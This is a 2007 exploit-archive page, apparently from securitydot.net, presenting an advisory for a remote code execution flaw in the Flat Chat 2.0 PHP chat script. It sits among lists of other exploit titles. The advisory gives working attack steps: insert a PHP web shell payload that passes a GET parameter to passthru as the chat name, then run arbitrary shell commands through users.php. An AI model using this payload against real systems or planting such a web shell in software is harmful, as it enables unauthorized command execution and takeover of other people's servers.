exploits , vulnerabilities , articles , Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability

2007-04-13 Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit
2007-03-17 MPM Chat 2.5 (view.php logi) Local File Include Vulnerability
2006-09-04 FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability
2006-08-19 ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability
2006-08-07 XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)

2007-03-07

Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability

Rated as : High Risk

                                          
.-""""""""-.                       
         
                                          /   Dj7xpl   \                  
           
                                         |              |                 
              
                                         |,  .-.  .-.  ,|                 
              
                                         | )(_o/  \o_)( |                 
                   
                                         |/     /\     \|                 
               
                               (@_       (_     ^^     _)                 

                          _     )
\_______\__|IIIIII|__/_______________________________
                        
(_)@8@8{}<________|-\IIIIII/-|________________________________>
                                )_/        \          / 
                                (@
+_______________________________________________________________________________________________________________________+
+
+
+                              
+=============================================+
+                               |                                         
   |
+                               | Portal   : Flat Chat                    
   |
+                               | Version  : 2.0                          
   |
+                               | Author   : Dj7xpl  | Dj7xpl@yahoo.com   
   |
+                               | Download : Http://www.undoweb.frih.net  
   |
+                               | Risk     : High (Remote Code Execution) 
   |
+                               |                                         
   |
+                              
+=============================================+
+
+              Exploit : 
+                         Http://localhost/flatchat/index.php  
<<<<<<  Open Index Page
+
+                         Insert This Script In Chat Name:  e.g:  <?php
passthru($_GET[cmd]); ?>
+
+                         Http://localhost/flatchat/users.php?cmd=ls -la  
<<<  Enter Your Command
+                                                                         
    				            	  
+_______________________________________________________________________________________________________________________+
securitydot.net - 2007-03-07

Exploits - newest 10 RSS | More

2007-06-15 55518 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32863 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40907 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28522 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19080 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16132 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18748 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16029 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32692 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16651 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit